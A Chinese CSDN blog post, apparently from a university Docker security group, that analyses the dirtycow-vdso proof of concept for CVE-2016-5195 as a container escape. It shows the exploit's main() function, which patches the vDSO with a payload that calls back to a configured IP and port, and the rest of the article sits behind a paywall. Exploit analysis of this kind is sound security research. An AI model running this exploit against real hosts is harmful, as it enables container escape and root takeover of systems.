脏牛漏洞-Docker逃逸POC(dirtycow-vdso)代码分析

最新推荐文章于 2024-06-18 13:31:09 发布
最新推荐文章于 2024-06-18 13:31:09 发布
阅读量7.3k 收藏 4
点赞数 2
分类专栏: Linux本地提权漏洞 文章标签: 脏牛漏洞 Docker逃逸
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/enjoy5512/article/details/53196047
版权

利用代码原出处
代码原帖

本人GitHub也保留有漏洞利用相关代码
CVE-2016-5195

作者 : 武汉大学Docker安全研究小组

一 . 代码运行流程


Main函数 

int main(int argc, char *argv[])
{
    struct prologue *prologue;
    struct mem_arg arg;
    uint16_t port;
    uint32_t ip;
    int s;

    ip = htonl(PAYLOAD_IP);
    port = htons(PAYLOAD_PORT);

    if (argc > 1) {
        if (parse_ip_port(argv[1], &ip, &port) != 0)
            return EXIT_FAILURE;
    }

    fprintf(stderr, "[*] payload target: %s:%d\n",
        inet_ntoa(*(struct in_addr *)&ip), ntohs(port));

    arg.vdso_addr = get_vdso_addr();
    if (arg.vdso_addr == NULL)
        return EXIT_FAILURE;

    prologue = fingerprint_prologue(arg.vdso_addr);
    if (prologue == NULL) {
        fprintf(stderr, "[-] this vDSO version isn't supported\n");
        fprintf(stderr, "    add first entry point instructions to prologues\n");
        return EXIT_FAILURE;
    }

    if (patch_payload(prologue, ip, port) == -1)
        return EXIT_FAILURE;

    if (build_vdso_patch(arg.vdso_addr, prologue) == -1)
        return EXIT_FAILURE;

    s = create_socket(port);
    if (s == -1)
        return EXIT_FAILURE;

    if (exploit(&arg, true) == -1) {
        fprintf(stderr, "exploit failed\n");
        return EXIT_FAILURE;
    }

    yeah(&arg, s);

    return EXIT_SUCCESS;
}
Created with Raphaël 2.1.0 开始 htonl()/htons() IP转换
最低0.47元/天 解锁文章
enjoy5512
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Docker逃逸--漏洞POC测试
07-25 1093
漏洞(CVE-2016-5195)与VDSO(虚拟动态共享对象) 一、漏洞描述 Dirty Cow(CVE-2016-5195)是Linux内核中的权限提升漏洞,源于Linux内核的内存子系统在处理写入时拷贝(copy-on-write, Cow)存在竞争条件(race condition),允许恶意用户提权获取其他只读内存映射的写访问权限。 竞争条件意为任务执行顺序异常,可能导致应...
Docker 容器逃逸案例分析
yunqishequ1的博客
07-20 5059
摘要: ## 0. 前言 本文参考自《Docker 容器与容器云》 这个容器逃逸的 case 存在于 Docker 1.0 之前的绝大多数版本。 目前使用 Docker 1.0 之前版本的环境几乎不存在了,这篇分析的主要目的是为了加深系统安全方面的学习。 本案例所分析PoC 源码地址:[shocker.c](https://github.com/gabrtv/shocker/b 0.
探索 Dirty COW VDSO:一个深入Linux内核的安全研究工具
gitblog_00092的博客
04-18 235
探索 Dirty COW VDSO:一个深入Linux内核的安全研究工具 项目地址:https://gitcode.com/scumjr/dirtycow-vdso 在网络安全领域,了解和研究漏洞是至关重要的工作。Dirty COW(亦称为 CVE-2016-5195)是一个著名的Linux内核权限提升漏洞,它允许非特权用户以root权限执行代码。而GitCode上的Dirty COW VDSO项...
docker逃逸方法汇总与简要分析
最新发布
白帽黑客鹏哥的博客
06-18 910
Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,它允许用户通过RESTful API与Docker引擎进行交互,这意味着开发人员可以使用HTTP请求来远程管理和控制Docker引擎,包括创建、启动、停止和删除容器,构建和管理镜像,以及执行其他与Docker相关的操作。
Docker容器逃逸
weixin_44720441的博客
08-23 1167
Docker容器逃逸指的是攻击者通过劫持容器化业务逻辑或直接控制(CaaS等合法获得容器控制权的场景)等方式,已经获得了容器内某种权限下的命令执行能力;攻击者利用这种命令执行能力,借助一些手段进而获得该容器所在的直接宿主机(当遇到“物理机运行虚拟机,虚拟机再运行容器”的场景时,该场景下的直接宿主机指容器外层的虚拟机)上某种权限下的命令执行能力。
Docker Dirty Cow逃逸
weixin_33966365的博客
10-29 382
2019独角兽企业重金招聘Python工程师标准>>> ...
关于Docker逃逸
qq_50854662的博客
04-27 494
关于Docker逃逸
centos7.6离线安装docker-ce-19.03、nvidia-docker2
08-03
离线环境下,在centos7.6系统上安装docker-ce-19.03,nvidia-docker2.4版本,其中docker-ce-19.03在docker-local.tar压缩文件里面,nvidia-docker2在nvidia-docker2.zip文件中。 具体安装流程如下: 1.安装docker ...
基于RedHat——docker&docker-compose&nvidia-docker2&nvidia驱动离线安装
01-18
1.包含docker安装的包及依赖包 2.包含docker-compose安装的包及依赖包 3.基于RedHat系统的nvidia驱动包 4.nvidia-docker2驱动安装包及依赖包 5.安装命令简介 下载之后,可以在无网的环境下离线安装。
CentOS7_nvidia-docker2安装.rar
04-12
centos7 nvidia-docker2离线安装包,使用命令rpm -ivh --force *.rpm sudo systemctl restart docker sudo systemctl daemon-reload 依次执行此命令,如果 事先安装了containerd.io 则需要先进行 rpm -qa | grep ...
nvidia-docker2-rpm.tar.gz
11-07
3. 启动并启用NVIDIA Docker插件:`sudo systemctl start nvidia-docker-plugin && sudo systemctl enable nvidia-docker-plugin` 4. 验证安装:`docker run --rm --gpus all nvidia/cuda:10.0-base nvidia-smi` ...
ubuntu20.04下docker及nvidia-docker安装包
01-29
toolkit_1.5.1-1_amd64.deb nvidia-docker2_2.6.0-1_all.deb 2)docker:containerd.io_1.6.26-1_amd64.deb,docker-buildx-plugin_0.11.2-1~ubuntu.20.04~focal_amd64.deb,docker-ce_24.0.7-1~ubuntu.20.04~focal_...
【Docker】Docker逃逸小结
woodwhale的博客
03-28 1805
docker逃逸小结
生命在于学习——docker逃逸
易水哲的博客
12-02 4644
docker逃逸就是从当前docker容器权限中逃逸出来,获得宿主机的权限。
linux提权之dirtycow
qq_62370574的博客
01-20 1030
漏洞是一种影响Linux操作系统的本地特权升级漏洞,其全称为"Copy-On-Write"(写时复制)漏洞。这个漏洞在2016年被公开,并且影响了大量的Linux内核版本。Dirty COW漏洞的根本原因是在Linux在竞态条件下的机制的实现存在缺陷。Copy-On-Write是一种内存管理技术,它允许多个进程共享同一个物理内存页面的副本,直到其中一个进程尝试修改该页面时,系统才会复制出一个新的页面供修改进程使用。是多个并发操作或线程访问共享资源时可能出现的一种问题。
mongo db 参数详解
开发日志
03-29 1335
工具介绍: mongo           命令行客户端工具。 mongod          数据库服务程序。 mongodump       数据库备份程序。 mongoexport     数据导出工具。 mongofiles      GridFS工具,内建的分布式文件系统 mongoimport     数据导入工具。 mongorestore    数据库恢复工具。 m
浅谈容器逃逸
key_3_feng的博客
05-17 2667
红队视角下的容器逃逸利用及分析
ATpiu的博客
06-18 2051
容器逃逸/红队视角下的容器逃逸利用及分析
- docker images: - docker rmi - docker pull - docker push - docker save - docker load
02-23
Docker images是Docker中的一个重要概念它是用于创建Docker容器的基础。一个Dock image是一个只读的模板,包含了运行一个容器所需的所有文件系统、代码和依赖项。 下是对于您提到的几个D命令的介绍1. docker rmi:该命令用于删除一个或多个Docker镜像。可以通过镜像ID或者镜像名称来指定要删除的像。 2. docker pull:该命令于从Docker仓库中拉取(下载)一个Docker镜像到本地。可以通过指定镜像名称和标签来拉取特定版本的镜像。 3. docker push:该命令用于将本地的Docker镜像推送(上传)到Docker仓库中,以便其他人可以从仓库中拉取使用。需要先登录到Docker仓库才能进行推送操作。 4. docker save:该命令用于将一个或多个Docker镜像保存为一个tar文件。这个tar文件可以用于在其他机器上使用docker load命令加载这些镜像。 5. docker load:该命令用于从一个tar文件中加载(导入)一个或多个Docker镜像到本地。这些镜像可以是通过docker save命令保存的。 希望以上解答对您有帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值